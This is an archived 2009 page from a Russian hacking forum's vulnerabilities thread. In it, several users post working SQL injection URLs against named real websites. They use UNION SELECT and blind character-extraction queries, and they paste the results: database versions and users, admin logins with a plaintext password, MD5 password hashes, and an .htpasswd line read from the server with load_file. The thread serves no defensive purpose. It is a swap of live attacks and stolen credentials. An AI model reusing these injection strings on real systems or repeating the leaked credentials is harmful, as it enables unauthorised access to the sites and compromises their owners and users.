ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8341  
Старый 14.03.2009, 01:52
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

http://www.claimscompensation.com

http://www.claimscompensation.com/news.php?id=1+union+select+1,concat_ws(0x3a,vUser, vPassword,vAdmin_email),3,4,5,6,7,8, 9,0+from+admin--

database version 5.0.67.d7
database_name - ccb_cms

vUser - admin
vPassword -ccb
vAdmin_email - bh@claimscompensation.com

Последний раз редактировалось farex; 14.03.2009 в 01:56..
 
Ответить с цитированием

  #8342  
Старый 14.03.2009, 02:47
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию

Код:
http://www.anitaroddick.com/readmore.php?sid=-44+union+select+1,2,3,convert((username)+using+latin1),convert((user_password)+using+latin1),6,7,8,9+from+users--
все юзвери как на ладони
 
Ответить с цитированием

  #8343  
Старый 14.03.2009, 03:05
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию

Код:
http://www.lrwc.org/pub2.php?sid=-999+union+select+1,concat(version(),0x3b,database(),0x3b,user()),3,4,5,6,7,8--
4.0.27-log
 
Ответить с цитированием

  #8344  
Старый 14.03.2009, 03:45
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.poster.by/main.php?cat=-1)+union+select+concat_ws(0x3a3a,email,login,passw ord),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+use rs+limit+20,1/*

No commetns
 
Ответить с цитированием

  #8345  
Старый 14.03.2009, 04:01
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию

Код:
http://www.unimerco.com/index.php?mid=99+union+select+1,2,3,4,version(),6,7,8/*
4.0.18-standard-log
 
Ответить с цитированием

  #8346  
Старый 14.03.2009, 04:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.cautis.ro/ro/index.php?id=10077+AND+ASCII(SUBSTRING((select+y=1...3() ),1,1)>x&lang=ro

y1=version
y2=database
y3=user

x1=52,46,49,46,50,48,45,108,111,103
x2=99,97,117,116,105,115
x3=99,97,117,116,105,115,64,108,111,99,97,108,104, 111,115,116


Version : 4.1.20-log
Database : cautis
User : cautis@localhost
 
Ответить с цитированием

  #8347  
Старый 14.03.2009, 12:09
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--
Database Version : 4.1.22
Database name : parktime_db_main
User name : parktime_mysql@10.1.48.39


админ :

Код:
http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat _ws(0x3a,login,password),2+from+users--
Код:
admin:65d9468e73f95afaeb578d5312d577f4
 
Ответить с цитированием

  #8348  
Старый 14.03.2009, 13:37
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

www.litexplus.md

Database Version: 5.0.24a
Database name: litexplus
User name: root@localhost


Код:
http://www.litexplus.md/articles.php?id=5+union+select+1,concat(login,0x3a,pass)+from+users
admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass

Код:
http://www.litexplus.md/swadmin
file_priv Y

Код:
http://www.litexplus.md/articles.php?id=5+union+select+1,load_file(0x2f686f6d652f7777772f6c69746578706c75732e6d642f737761646d696e2f2e6874706173737764)
frik:rmlqmtXgO9.rc:111


Код:
http://www.litexplus.md/sql
 
Ответить с цитированием

  #8349  
Старый 14.03.2009, 15:59
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

2diznt
В антибоян заглядывать надо.....



Цитата:
http://halyava.net/index.php?idk=-12+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
5.0.67-community:halyava_admin@localhost:halyava_catalog
 
Ответить с цитированием

  #8350  
Старый 14.03.2009, 20:42
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.acorn-sb.ru/read.php?nid=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6--
Database Version : 4.0.26
Database name : acorn_sbru
User name : acorn_sbru@acorn-sb.ru


------------------------------------------------------+

Код:
http://www.slavich.ru/?id=3&aid=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5,6,7--
Database Version : 5.0.32-Debian_7etch5-log
Database name : slavich
User name : slavich@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ